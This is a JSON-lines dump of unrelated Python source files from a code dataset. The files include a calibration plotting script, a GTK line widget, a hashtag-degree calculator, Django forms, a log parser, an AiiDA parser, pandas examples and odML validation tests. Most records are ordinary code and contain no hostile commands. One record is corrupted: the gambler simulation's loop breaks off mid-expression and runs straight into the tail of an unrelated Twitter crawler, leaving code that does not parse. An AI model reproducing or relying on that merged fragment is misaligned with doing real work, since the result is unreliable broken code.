auxList: Any list of strings.\n :return: A cleaned list of strings.\n \"\"\"\n final = []\n cleaningChars = [\n '\\n', '\\t', '\\r']\n for elem in auxList:\n for c in cleaningChars:\n elem = elem.replace(c, '')\n\n elem = re.sub('<.+?>', ' ', elem)\n final.append(elem)\n\n return final","sub_path":"pycfiles/i3visiotools-v0.2.3.linux-i686.tar/darkengine.py","file_name":"darkengine.py","file_ext":"py","file_size_in_byte":2993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"389271598","text":"import numpy as np\nimport matplotlib.pyplot as plt\nplt.rcParams['figure.figsize'] = [10,10]\nimport csv\nfrom decimal import Decimal\nimport math\nfrom format import sci_not\n\n\npath = '../Tests/Serial102/'\n#CURRENT\nrange_values=[1,10,100,1000,50e3]\n#range_values=[1]\nave_time='100'\nnum_points=15\nfor arg in sys.argv:\n if arg.split('=')[0]=='path':\n path=arg.split('=')[1]\nprint('Path is set to '+path)\n \nfor range_value in range_values:\n plt.close()\n for channel in range(4):\n x = []\n xo=[]\n y = []\n yo=[]\n dy = []\n dyo=[]\n markers= [',', 'x', '+', 'v','^', '<', '>', 's', 'd']\n line=0\n with open(path+'data/'+ave_time+'ms_current'+str(channel)+'.1.csv','r') as csvfile:\n plots = csv.reader(csvfile, delimiter=',')\n next(csvfile)\n line+=1\n next(csvfile)\n line+=1\n for row in plots:\n if len(row)>1:\n if row[5]=='start':\n input=float(row[0])*(1e6)\n mean=float(row[3])\n std=float(row[4])\n rng=float(row[1])\n if rng == range_value:\n if line%num_points < num_points:\n x.append(input)\n y.append(mean)\n dy.append(std/num_points**0.5)\n if range_value!=50e3:\n if input < range_value:\n xo.append(input)\n yo.append(mean)\n dyo.append(std/num_points**0.5)\n else:\n if input < range_value*0.8:\n xo.append(input)\n yo.append(mean)\n dyo.append(std/num_points**0.5)\n line+=1\n p, c = np.polyfit(xo, yo, 1, w=dyo, cov=True)\n e = np.sqrt(np.diag(c))\n slope=sci_not(p[0],e[0],True)\n offset=sci_not(p[1],e[1],True)\n #print([p[1],e[1]])\n slope_str= '('+str(slope[0])+'\\\\pm'+str(slope[1])+')e'+str(slope[2]) if slope[2] != 0 else str(slope[0])+'\\\\pm'+str(slope[1])\n offset_str= '('+str(offset[0])+'\\\\pm'+str(offset[1])+')e'+str(offset[2]) if offset[2] != 0 else str(offset[0])+'\\\\pm'+str(offset[1])\n med_std=sci_not(dyo[round(len(dyo)/2)]*num_points**0.5,dyo[round(len(dyo)/2)]*num_points**0.5,True)\n std_str= str(med_std[0])+'e'+str(med_std[2]) if med_std[2] != 0 else str(med_std[0])\n if channel!=3:\n print(str(channel)+' & '+str(range_value)+' & $'+slope_str+'$ & $'+offset_str+'$ & '+std_str+' \\\\\\\\ \\\\hline')\n else:\n print(str(channel)+' & '+str(range_value)+' & $'+slope_str+'$ & $'+offset_str+'$ & '+std_str+' \\\\\\\\ \\\\Xhline{3\\\\arrayrulewidth}')\n #\\\\\\\\ \\\\Xhline{3\\\\arrayrulewidth}\n\n slope=sci_not(p[0],e[0])\n offset=sci_not(p[1],e[1])\n\n plt.plot(np.array(x),offset[0]*10**offset[2]+np.array(x)*slope[0]*10**slope[2])\n plt.scatter(x,y, marker=markers[channel],label='channel'+str(channel))\n\n plt.legend()\n plt.xlabel('Input (\\u03bcA)')\n plt.ylabel('Measurement (\\u03bcA)')\n plt.title('Ave. Time '+ave_time+'ms, '+'Range '+str(int(range_value)))\n #plt.show()\n plt.savefig(path+'plot/'+ave_time+'ms_range'+str(int(range_value))+'.png')\n","sub_path":"Analysis/current_analysis.py","file_name":"current_analysis.py","file_ext":"py","file_size_in_byte":3514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"333630217","text":"import gtk\nimport os\nfrom lxml import etree\nfrom dragSourceEventBox import DragSourceEventBox\nfrom colors2 import colors\nfrom shadow import Shadow\nfrom pythonValue import PythonValue\nfrom elementValue import ElementValue\nfrom expand import Expand\nfrom colorChooserButton import ColorChooserButton\nfrom valueValidator import ValueValidator\n\nclass Line(DragSourceEventBox):\n def __init__(self, manager, parent):\n DragSourceEventBox.__init__(self, self)\n self.manager = manager\n self.parentContainer = parent\n self.lineType = ''\n self.customLine = False #false=can not change hor/ver, True = user can change hor/ver\n tempParent = parent\n while tempParent:\n if type(tempParent).__name__ == 'Container':\n if tempParent.isHBox():\n self.lineType = 'vertical'\n else:\n self.lineType = 'horizontal'\n break\n else:\n tempParent = tempParent.parent\n if self.lineType == '':\n self.lineType = 'horizontal'\n self.customLine = True\n\n self.comboType = gtk.combo_box_new_text()\n self.comboType.append_text('horizontal')\n self.comboType.append_text('vertical')\n\n self.drawArea = None\n self.box = None\n self.modify_bg(gtk.STATE_NORMAL, gtk.gdk.color_parse(\"black\"))\n self.shadow = Shadow(self)\n\n self.eB = gtk.EventBox()\n self.eB.set_border_width(2)\n\n self.createContent()\n self.connect('button-press-event', self.showProperties)\n\n self.eB.add(self.box)\n self.add(self.eB)\n\n if type(self.parentContainer).__name__ == 'Container':\n self.drag_source_set(gtk.gdk.BUTTON1_MASK,[],0)\n self.drag_dest_set(0,[],0)\n self.connect('drag_motion', self.motion_cb)\n self.connect('drag_drop', self.drop_cb)\n\n self.buttonColor = ColorChooserButton(self, 'Select line color')\n\n def createContent(self):\n if self.lineType == 'horizontal':\n self.box = gtk.HBox()\n else:\n self.box = gtk.VBox()\n label = gtk.Label(' Line ')\n self.drawArea = gtk.DrawingArea()\n self.drawArea.connect('expose-event',self.exposeLine)\n\n iconEvent = gtk.EventBox()\n iconEvent.set_border_width(2)\n iconEvent.connect('button-release-event', self.deleteClicked)\n icon = gtk.Image()\n icon.set_from_file(os.path.split(os.path.realpath(__file__))[0]+'/delete.png')\n iconEvent.add(icon)\n\n self.box.pack_start(label,False)\n self.box.pack_start(self.drawArea,False)\n self.box.pack_end(iconEvent,False,True,2)\n\n def exposeLine(self, drawArea, data):\n style = drawArea.get_style()\n gc = style.fg_gc[gtk.STATE_NORMAL]\n gc.set_values(line_style=gtk.gdk.LINE_SOLID)\n gc.set_values(line_width=1)\n tempColor = gc.foreground\n x, y = self.window.get_size()\n if self.buttonColor.color:\n if not self.buttonColor.color.startswith('#'):\n try:\n gc.foreground = drawArea.get_colormap().alloc(gtk.gdk.Color(self.buttonColor.color))\n except ValueError:\n gc.foreground = drawArea.get_colormap().alloc(gtk.gdk.Color('#'+self.buttonColor.color))\n else:\n gc.foreground = drawArea.get_colormap().alloc(gtk.gdk.Color(\"black\"))\n else:\n gc.foreground = drawArea.get_colormap().alloc(gtk.gdk.Color(\"black\"))\n\n if self.lineType == 'horizontal':\n if x-75 < 40:\n x1 = 40\n else:\n x1 = x-75\n drawArea.set_size_request(x1, 7)\n x, y = drawArea.window.get_size()\n drawArea.window.draw_line(gc, 0, y/2, x1, y/2)\n else:\n if y-50 < 40:\n y1 = 40\n else:\n y1 = y-50\n drawArea.set_size_request(20, y1)\n x, y = drawArea.window.get_size()\n drawArea.window.draw_line(gc, x/2, 0, x/2, y1)\n gc.foreground = tempColor\n\n def showProperties(self, widget, w):\n if self.manager.lastHighligted:\n self.manager.lastHighligted.modify_bg(gtk.STATE_NORMAL, gtk.gdk.color_parse(\"black\"))\n self.manager.lastHighligted = self\n self.modify_bg(gtk.STATE_NORMAL, gtk.gdk.color_parse(\"green\"))\n box = self.manager.wTree.get_widget('vbox_properties')\n for w in box.children():\n box.remove(w)\n labelType = gtk.Label('Type')\n labelType.set_alignment(0.01, 0.5)\n if self.lineType == 'horizontal':\n self.comboType.set_active(0)\n else:\n self.comboType.set_active(1)\n self.comboType.connect('changed', self.changeLineType)\n\n labelColor = gtk.Label('Line color')\n labelColor.set_alignment(0.01, 0.5)\n hBox = gtk.HBox()\n hBox.pack_start(labelColor,False)\n hBox.pack_end(PythonValue(self,'Line color'),False)\n hBox.pack_end(ElementValue(self,'Line color'),False)\n\n if self.customLine:\n box.pack_start(labelType, False)\n box.pack_start(self.comboType, False)\n box.pack_start(gtk.Label(' '),False)\n box.pack_start(hBox, False)\n box.pack_start(self.buttonColor, False)\n box.pack_start(gtk.Label(' '),False)\n box.pack_start(self.shadow,False)\n box.show_all()\n\n def changeLineType(self, combo):\n self.lineType = combo.get_active_text()\n self.eB.remove(self.box)\n self.createContent()\n self.eB.add(self.box)\n self.show_all()\n\n def deleteClicked(self, widget, w):\n dialog = gtk.MessageDialog(None,0,gtk.MESSAGE_QUESTION,gtk.BUTTONS_YES_NO,'Delete line?')\n response = dialog.run()\n if response == gtk.RESPONSE_YES:\n if self.parentContainer == None:\n self.manager.clearAll()\n else:\n self.parentContainer.deleteChild(self)\n self.manager.clearProperties()\n dialog.destroy()\n\n def setElementValue(self, attrib, value):\n self.buttonColor.color = value\n if value:\n self.buttonColor.set_label(self.buttonColor.color)\n else:\n self.buttonColor.set_label('')\n self.exposeLine(self.drawArea, None)\n\n def colorChanged(self, newColor, attrib):\n if attrib == 'Select line color':\n self.exposeLine(self.drawArea, None)\n\n def getApp(self):\n app = etree.Element('Line')\n if self.lineType != '':\n app.attrib['type'] = self.lineType\n if self.buttonColor.color:\n app.attrib['color'] = self.buttonColor.getColor()\n if self.shadow.padding > 0 or self.shadow.buttonColor.color:\n shadow = self.shadow.getXMLFormat()\n shadow.append(app)\n app = shadow\n return app\n\n def setLineType(self, type):\n self.lineType = type\n if type == 'horizontal':\n self.comboType.set_active(0)\n if type == 'vertical':\n self.comboType.set_active(1)\n self.changeLineType(self.comboType)\n\n @staticmethod\n def validate(element, dataElement):\n color = element.get('color')\n if color:\n if not ValueValidator.validate(color, dataElement):\n return False, 'Unknown element attribute for line color: ' + color\n return True, None\n","sub_path":"plugin/appearance/line.py","file_name":"line.py","file_ext":"py","file_size_in_byte":7505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"318103512","text":"import random\ndef gambler(stake,goal,trails):\n bets=0\n win=0\n loss=0\n for i in range(0,51):\n cash=stake\n while(cash>0 and cash [\\x1b[31m%d\\x1b[0m] Tweets...\" % result_count)\n print(\" Timeout Requests API... \")\n print(\" \\x1b[31mEsperando...\\x1b[0m 15 min \")\n time.sleep(15 * 60)\n continue\n","sub_path":"Crawler scripts/miner_onlygeo_geo.py","file_name":"miner_onlygeo_geo.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"382289948","text":"# example of program that calculates the average degree of hashtags\nimport json\nimport collections\nfrom datetime import datetime\nimport time\nimport sys\nimport re\n\nclass Socialgraph:\n def __init__(self,fileread,filewrite):\n self.nodeLink = dict() # a 2d dictionary, keys are nodeid, value is time\n self.curtime = 0\n self.fileread = open(fileread, 'r')\n self.filewrite = open(filewrite,'w')\n self.log = collections.deque() # the moving window of {time:hashtags}\n\n def processfile(self):\n for line in self.fileread:\n data = json.loads(line)\n if 'text' in data and 'created_at' in data:\n texttime = data['created_at'].encode('ascii','ignore')\n self.curtime = time.mktime(datetime.strptime(texttime,'%a %b %d %H:%M:%S +0000 %Y').timetuple())\n if \"entities\" in data and \"hashtags\" in data[\"entities\"]:\n taglist = self.extractHashtag(data['entities']['hashtags'])\n else:\n taglist = []\n # taglist = self.extractHashtag(data['text'].encode('ascii','ignore'))\n\n self.log.append({'time': self.curtime,'taglist':taglist})\n self.groupConnect(taglist)\n self.removeLogs()\n self.calAvgDegree()\n\n## Go through the log and disconnect links until curtime-60seconds\n def removeLogs(self):\n while len(self.log) !=0:\n elem = self.log[0]\n if elem['time']= 2:\n for i in xrange(0,length-1):\n for j in xrange(i+1,length):\n if taglist[i]!= taglist[j]:\n self.Connect(taglist[i],taglist[j])\n\n## Disconnect a group of hashtags if the links between them has not been updated for 60 seconds\n def groupDisconnect(self,taglist):\n length = len(taglist)\n if length >= 2:\n for i in xrange(0,length-1):\n for j in xrange(i+1,length):\n if taglist[i]!= taglist[j]:\n self.Disconnect(taglist[i],taglist[j])\n\n# Caluculate the average degree in the social graph\n def calAvgDegree(self):\n if len(self.nodeLink) == 0:\n avgdegree = 0.0\n else:\n sumdegree = 0.0\n for elem in self.nodeLink:\n sumdegree +=len(self.nodeLink[elem])\n avgdegree = sumdegree/len(self.nodeLink)\n self.filewrite.write(\"%.2f\\n\"%avgdegree)\n\n# Connect two hashtags in the social graph\n def Connect(self,word1,word2):\n if word1 not in self.nodeLink:\n self.nodeLink[word1] = {word2:self.curtime}\n else:\n self.nodeLink[word1][word2] = self.curtime\n if word2 not in self.nodeLink:\n self.nodeLink[word2] = {word1:self.curtime}\n else:\n self.nodeLink[word2][word1] = self.curtime\n\n# Disconnect two hashtags in the social graph if the link has not been updated for 60 seconds\n def Disconnect(self,word1,word2):\n if word1 in self.nodeLink:\n if word2 in self.nodeLink[word1] and self.nodeLink[word1][word2]1:\n input = sys.argv[1]\n output = sys.argv[2]\n else:\n input = \"../tweet_input/tweets.txt\"\n output = \"../tweet_output/ft2.txt\"\n sg = Socialgraph(input,output)\n sg.processfile()","sub_path":"src/average_degree.py","file_name":"average_degree.py","file_ext":"py","file_size_in_byte":4630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"169115198","text":"from django import forms\n\nfrom django.core.exceptions import ValidationError\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.conf import settings\nfrom .models import SolicitudPresupuesto, ModoEnvio, TipoMaterial, TipoTrabajo, Terminacion, \\\n Cliente, MedidaEstandar, Cantidades, ColorImpresion\n\nclass SolicitudPresupuestoForm(forms.ModelForm):\n class Meta:\n model = SolicitudPresupuesto\n fields = ['orientacion', 'doble_cara_impresion',\n 'disenio_incluido', 'terminacion_incluido', 'express', 'comentarios',\n 'url_carpetas_adjuntos', 'color'\n ]\n CHOICES = (('1', 'Si',), ('0', 'No',))\n CHOICES_2 = (('H','Horizontal'), ('V', 'Vertical'))\n\n labels = {\n 'doble_cara_impresion': _('Impresión en ambas caras'),\n 'disenio_incluido': _('Diseño incluído'),\n 'terminacion_incluido': _('Incluye terminaciones'),\n 'express': _('Trabajo express'),\n 'url_carpetas_adjuntos': _('Subir archivo de diseño')\n }\n\n help_texts = {\n 'express': _('Incluye costo adicional. Consulte por más información.'),\n }\n\n widgets = {\n 'disenio_incluido': forms.Select(choices=CHOICES),\n 'terminacion_incluido': forms.Select(choices=CHOICES),\n 'express': forms.Select(choices=CHOICES),\n 'doble_cara_impresion': forms.Select(choices=CHOICES),\n 'orientacion': forms.Select(choices=CHOICES_2),\n 'doble_cara_terminacion': forms.Select(choices=CHOICES),\n 'comentarios': forms.Textarea(attrs={'rows':4, 'cols':30}),\n 'url_carpetas_adjuntos': forms.FileInput(),\n #'color': forms.Select(choices=)\n }\n\n\nclass ModoEnvioForm(forms.ModelForm):\n class Meta:\n model = ModoEnvio\n fields = ['detalle_modo_envio']\n\n widgets={\n 'detalle_modo_envio': forms.Select(choices=((x.id_modo_envio, x.detalle_modo_envio) for x in ModoEnvio.objects.all().order_by('id_modo_envio')))\n }\n\n\nclass TipoMaterialForm(forms.ModelForm):\n class Meta:\n model = TipoMaterial\n\n fields=['nombre_material']\n\n widgets={\n 'nombre_material': forms.Select(choices=((x.id_material, x.nombre_material) for x in TipoMaterial.objects.all().order_by('nombre_material')),)\n }\n\n\nclass ClienteForm(forms.ModelForm):\n class Meta:\n model=Cliente\n fields=['razon_social', 'tel_1', 'interno_tel_1','tel_2', 'interno_tel_2', 'email_1', 'tipo_doc', 'nro_doc',\n 'contacto_1', 'horario_contacto']\n\n labels = {\n 'razon_social': _('Nombre y Apellido / Razón Social'),\n 'tel_1': _('Teléfono'),\n 'interno_tel_1': _('Interno'),\n 'tel_2': _('Teléfono alternativo'),\n 'interno_tel_2': _('Interno tel alt.'),\n 'email_1': _('Email'),\n 'tipo_doc': _('Tipo de documento'),\n 'nro_doc': _('Nro de documento'),\n 'contacto_1': _('Contacto'),\n }\n\n CHOICES = (('dni', 'DNI',), ('cuit', 'CUIT',),)\n\n widgets = {\n 'tel_1': forms.TextInput(),\n 'interno_tel_1': forms.TextInput(),\n 'tel_2': forms.TextInput(),\n 'interno_tel_2': forms.TextInput(),\n 'tipo_doc': forms.Select(choices=CHOICES)\n }\n error_messages = {\n 'interno_tel_1': {\n 'invalid': _('Sólo números')\n },\n 'interno_tel_2': {\n 'invalid': _('Sólo números')\n },\n }\n\n help_texts = {\n 'nro_doc': _('Sólo números. Sin guiones ni puntos'),\n 'tel_1': _('Sólo números. Sin guiones ni puntos ni paréntesis'),\n 'tel_2': _('Sólo números. Sin guiones ni puntos ni paréntesis'),\n 'interno_tel_1':_('Sólo números'),\n 'interno_tel_2': _('Sólo números'),\n 'razon_social': _('')\n }\n\n def clean_razon_social(self):\n data = self.cleaned_data['razon_social']\n for d in data:\n if not (d.isspace() or d.isalpha()):\n raise ValidationError(_('Nombre inválido. No se admiten números ni caracteres especiales'), code='invalid')\n\n return data\n\n def clean_contacto_1(self):\n data = self.cleaned_data['contacto_1']\n if data is not None:\n for d in data:\n if not (d.isspace() or d.isalpha()):\n raise ValidationError(_('Nombre inválido. No se admiten números ni caracteres especiales'), code='invalid')\n\n return data\n\n def clean_tel_1(self):\n data = self.cleaned_data.get('tel_1')\n if data is not None:\n for d in data:\n if not d.isdigit():\n raise ValidationError(_('Teléfono inválido. Sólo números'), code='invalid')\n return data\n\n def clean_int_tel_1(self):\n data = self.cleaned_data.get('interno_tel_1')\n if data is not None:\n for d in data:\n if not d.isdigit():\n raise ValidationError(_('Interno inválido. Sólo números'), code='invalid')\n return data\n\n def clean_tel_2(self):\n data = self.cleaned_data.get('tel_2')\n if data is not None:\n for d in data:\n if not d.isdigit():\n raise ValidationError(_('Teléfono inválido. Sólo números'), code='invalid')\n return data\n\n def clean_int_tel_2(self):\n data = self.cleaned_data.get('interno_tel_2')\n if data is not None:\n for d in data:\n if not d.isdigit():\n raise ValidationError(_('Interno inválido. Sólo números'), code='invalid')\n return data\n\n def clean_nro_doc(self):\n tipo_doc = self.cleaned_data.get('tipo_doc')\n data = self.cleaned_data.get('nro_doc')\n if data is not None:\n for d in data:\n if not d.isdigit():\n raise ValidationError(_('Número de documento inválido. Sólo números'), code='invalid')\n elif tipo_doc == 'dni' and len(data) < 7:\n raise ValidationError(_('La longitud del número no es válido'), code='invalid')\n elif tipo_doc == 'cuit' and len(data) != 11:\n raise ValidationError(_('La longitud del número no es válido'), code='invalid')\n return data\n\n\nclass TipoTrabajoForm(forms.ModelForm):\n class Meta:\n model=TipoTrabajo\n fields = ['detalle_tipo_trabajo']\n labels = {\n 'detalle_tipo_trabajo': _('Trabajo')\n }\n widgets = {\n 'detalle_tipo_trabajo': forms.Select(choices=((x.id_tipo_trabajo, x.detalle_tipo_trabajo)for x in TipoTrabajo.objects.all().order_by('detalle_tipo_trabajo')),)\n }\n\n\nclass MedidasForm(forms.Form):\n medidas = forms.ModelChoiceField(queryset=MedidaEstandar.objects.all(), label=\"Medidas estándar (cm)\", required=False,\n empty_label='Seleccione una medida estándar')\n\n\nclass CantidadesForm(forms.ModelForm):\n #flg_terminacion = forms.BooleanField(initial=False, label=\"¿Requiere de terminaciones?\", required=False)\n class Meta:\n model = Cantidades\n fields = ['cantidad']\n labels = {\n 'cantidad': _('Ingrese cantidad')\n }\n widgets = {\n 'cantidad': forms.Select(choices=((x.id_cantidad, str(x.cantidad)) for x in Cantidades.objects.all().order_by('cantidad')))\n }\n","sub_path":"safetag_project/safetag/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":7614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"256460265","text":"import sys\nimport json\nMINUS_INFINITY = -float('inf')\n\n# How many INFO log lines are there?\n# How many WARN log lines are there?\n# How many unique sn values are there?\n# How many unique si values are there?\n# What is max value for ss? (note, max ss is a value that is closest to 0 without being positive)\n\ndef process_line(line):\n\tsum_info = 0\n\tsum_warn = 0\n\tm = MINUS_INFINITY\n\ts_sn = set()\n\ts_si = set()\n\tarr = [(x.strip()[:4], json.loads(x[x.find('{')-1:x.rfind('}')+1].strip())) for x in line.split('_jspService') if x.strip() != '']\n\t\n\tfor x in arr:\n\t\tif x[0] == 'INFO':\n\t\t\tsum_info += 1\n\t\telif x[0] == 'WARN':\n\t\t\tsum_warn += 1\n\t\ts_sn.add(x[1]['sn'])\n\t\ts_si.add(x[1]['ht'][0]['si'])\n\t\tss = x[1]['ht'][0]['ss']\n\t\tif ss > m and ss < 0:\n\t\t\tm = ss\n\t\t\t\n\tprint('INFO',sum_info)\n\tprint('WARN',sum_warn)\n\tprint('number of distinct sn', len(s_sn))\n\tprint('number of distinct si', len(s_si))\n\tprint('max value of ss', m)\n\nwith open(sys.argv[1], 'r') as test_cases:\n\tfor line in test_cases:\n\t\tline = line.rstrip('\\n')\n\t\tif len(line) > 0:\n\t\t\tprocess_line(line)","sub_path":"e_d/prog.py","file_name":"prog.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"403769355","text":"# -*- coding: utf-8 -*-\n\"\"\"\nParsers provided by aiida_diff.\n\nRegister parsers via the \"aiida.parsers\" entry point in setup.json.\n\"\"\"\nfrom __future__ import absolute_import\n\nfrom six.moves import zip\n\nfrom aiida.engine import ExitCode\nfrom aiida.parsers.parser import Parser\nfrom aiida.common import exceptions\nfrom aiida.plugins import CalculationFactory\n\nDiffCalculation = CalculationFactory('diff')\n\n\nclass DiffParser(Parser):\n \"\"\"\n Parser class for parsing output of calculation.\n \"\"\"\n\n def __init__(self, node):\n \"\"\"\n Initialize Parser instance\n \"\"\"\n super(DiffParser, self).__init__(node)\n if not issubclass(node.process_class, DiffCalculation):\n raise exceptions.ParsingError(\"Can only parse DiffCalculation\")\n\n def parse(self, **kwargs):\n \"\"\"\n Parse outputs, store results in database.\n\n :returns: an exit code, if parsing fails (or nothing if parsing succeeds)\n \"\"\"\n from aiida.orm import SinglefileData\n\n # Check that the retrieved folder is there\n try:\n output_folder = self.retrieved\n except exceptions.NotExistent:\n return self.exit_codes.ERROR_NO_RETRIEVED_FOLDER\n\n # Check the folder content is as expected\n list_of_files = output_folder.list_object_names()\n output_files = [self.node.get_option('output_filename')]\n output_links = ['diff']\n # Note: set(A) <= set(B) checks whether A is a subset\n if set(output_files) <= set(list_of_files):\n pass\n else:\n self.logger.error(\n \"Not all expected output files {} were found\".format(\n output_files))\n\n # Use something like this to loop over multiple output files\n for fname, link in zip(output_files, output_links):\n\n with output_folder.open(fname) as handle:\n node = SinglefileData(file=handle)\n self.out(link, node)\n\n return ExitCode(0)\n","sub_path":"aiida_diff/parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"338971595","text":"#Concatenating and Appending dataframes - p.5 Data Analysis with Python and Pandas Tutorial\n#\n\nimport pandas as pd\n\ndf1 = pd.DataFrame({'HPI':[80,85,88,85],\n 'Int_rate':[2, 3, 2, 2],\n 'US_GDP_Thousands':[50, 55, 65, 55]},\n index = [2001, 2002, 2003, 2004])\n\ndf2 = pd.DataFrame({'HPI':[80,85,88,85],\n 'Int_rate':[2, 3, 2, 2],\n 'US_GDP_Thousands':[50, 55, 65, 55]},\n index = [2005, 2006, 2007, 2008])\n\ndf3 = pd.DataFrame({'HPI':[80,85,88,85],\n 'Int_rate':[2, 3, 2, 2],\n 'Low_tier_HPI':[50, 52, 50, 53]},\n index = [2001, 2002, 2003, 2004])\n\n#Concat adds to the bottom, kucky you if you get indexes right and matching data\n#\n\n\nconcat = pd.concat([df1,df3])\n#print(df1.head())\n#print(df3.head())\n#print(concat)\n#print (df2.head())\n#df4 = df1.append(df3)\n#print (df4)\n\ns = pd.Series([80,2,50], index=['HPI','Int_rate','US_GDP_Thousands']) #adding lines to the dataframe is the 'best way to add data'\ndf4 = df1.append(s, ignore_index=True)\nprint(df4)\n","sub_path":"Pandas_Tut/pandas4.py","file_name":"pandas4.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"612182736","text":"import math,random\n\nf=open('data_binning.csv','r')\ndata=f.readlines()\nlength = 0.3*len(data)\nf=open('sample_random','w')\nnumber=[]\ni=0\nfor _ in range(len(data)):\n\n if i > length:\n break\n num=random.randint(0,len(data))\n if num not in number:\n f.write(data[num])\n number.append(num)\n i=i+1\nf.close()\n","sub_path":"smaple_random.py","file_name":"smaple_random.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"364890719","text":"from gridfs import GridFS\n\n\nclass GridFsFiles:\n # pylint: disable=R0903\n def __init__(self, database):\n self._fs = GridFS(database)\n\n def find(self, file_name):\n grid_out = self._fs.find_one({\"filename\": file_name})\n\n if grid_out is None:\n raise KeyError\n else:\n return grid_out\n","sub_path":"ebl/files/file_repository.py","file_name":"file_repository.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"401593559","text":"#!/usr/bin/env python3.9\n\nimport sys\nimport pandas\n\n\n# Just like sorter except that prefix's are ordered by length from shortest to longest, this allows TCAM tree building\n# to be done in an easy and simple fashion (thanks again to the makers of the pandas module)\n\ndef main(argv):\n if len(argv) != 2:\n print(argv)\n print(\"Incorrect Arg count\")\n exit(1)\n with open(argv[0]) as input_file, open(argv[1], mode='w', newline='') as output_file:\n data = pandas.read_csv(input_file, index_col='Prefix')\n data.sort_values(['Length', 'Prefix'], axis=0, ascending=[True, True], inplace=True)\n data.to_csv(output_file)\n print(f\"Sorted {input_file.name} by prefix length and prefix, output in {output_file.name}\")\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"python_src/reversesorter.py","file_name":"reversesorter.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"392878540","text":"import unittest\nimport samplefile\nimport odml\nimport odml.validation\nimport odml.terminology\nimport odml.mapping\n\nvalidate = odml.validation.Validation\n\nclass TestValidation(unittest.TestCase):\n\n def setUp(self):\n self.doc = samplefile.SampleFileCreator().create_document()\n self.maxDiff = None\n\n def filter_repository_errors(self, errors):\n return filter(lambda x: not \"A section should have an associated repository\" in x.msg, errors)\n\n def filter_mapping_errors(self, errors):\n return filter(lambda x: not x.msg.startswith(\"mapping:\"), errors) \n\n def test_errorfree(self):\n res = validate(self.doc)\n self.assertEqual(self.filter_repository_errors(res.errors), [])\n \n def assertError(self, res, err, filter_rep=True, filter_map=False):\n \"\"\"\n passes only if err appears in res.errors\n \"\"\"\n errs = res.errors\n if filter_rep: errs = self.filter_repository_errors(errs)\n if filter_map: errs = self.filter_mapping_errors(errs)\n for i in errs:\n if err in i.msg:\n return\n self.assertEqual(errs, err)\n \n def test_section_type(self):\n doc = samplefile.parse(\"\"\"s1[undefined]\"\"\")\n res = validate(doc)\n # the section type is undefined (also in the mapping)\n self.assertError(res, \"Section type undefined\")\n\n def test_section_in_terminology(self):\n doc = samplefile.parse(\"\"\"s1[T1]\"\"\")\n res = validate(doc)\n self.assertError(res, \"A section should have an associated repository\", filter_rep=False)\n\n odml.terminology.terminologies['map'] = samplefile.parse(\"\"\"\n s0[t0]\n - S1[T1]\n \"\"\")\n odml.mapping.unmap_document(doc)\n doc.sections[0].repository = 'map'\n res = validate(doc)\n # TODO: mappings don't take over the repository attribute yet\n # thus the mapped equivalent of the document would still raise the error\n self.assertEqual(self.filter_mapping_errors(res.errors), [])\n \n def test_uniques(self):\n doc = samplefile.parse(\"\"\"\n s1[t1]\n s1[t1]\n \"\"\")\n res = validate(doc)\n self.assertError(res, \"name/type combination must be unique\")\n\n doc = samplefile.parse(\"\"\"\n s1[t1]\n - p1\n - p1\n \"\"\")\n res = validate(doc)\n self.assertError(res, \"Object names must be unique\")\n \n def test_mapping_errors(self):\n # 1. mappings don't resolve\n doc = samplefile.parse(\"\"\"s1[t1] mapping [T2]\"\"\")\n odml.terminology.terminologies['map'] = samplefile.parse(\"S1[T1]\")\n res = validate(doc)\n self.assertError(res, \"No section of type 'T2' could be found\")\n \n # 2. mapped property does not resolve\n doc = samplefile.parse(\"\"\"\n s1[t1]\n - p1 mapping [T1:P1]\n \"\"\")\n res = validate(doc)\n self.assertError(res, \"No property named 'P1' could be found in section 'S1'\")\n \n def test_invalid_mapped_document(self):\n # the following mapping creates an illegal document\n # in which the property P1 is found twice in the same section\n doc = samplefile.parse(\"\"\"\n s1[t1]\n - p1 mapping [T1:P1]\n - P1\n \"\"\")\n odml.terminology.terminologies['map'] = samplefile.parse(\"\"\"\n S1[T1]\n - P1\n \"\"\")\n res = validate(doc)\n self.assertError(res, \"mapping: Object names must be unique\")\n \n def test_property_in_terminology(self):\n doc = samplefile.parse(\"\"\"\n s1[t1]\n - P1\n \"\"\")\n odml.terminology.terminologies['term'] = samplefile.parse(\"\"\"\n S1[T1]\n - P1\n \"\"\")\n doc.repository = 'term'\n res = validate(doc)\n self.assertEqual(res.errors, [])\n \n doc = samplefile.parse(\"\"\"\n s1[t1]\n - p1\n - P1\n \"\"\")\n doc.repository = 'term'\n res = validate(doc)\n self.assertError(res, \"Property 'p1' not found in terminology\")\n\n def test_property_values(self):\n # different units\n doc = samplefile.parse(\"\"\"s1[t1]\"\"\")\n p = odml.Property(name=\"p1\", value=[0,1])\n 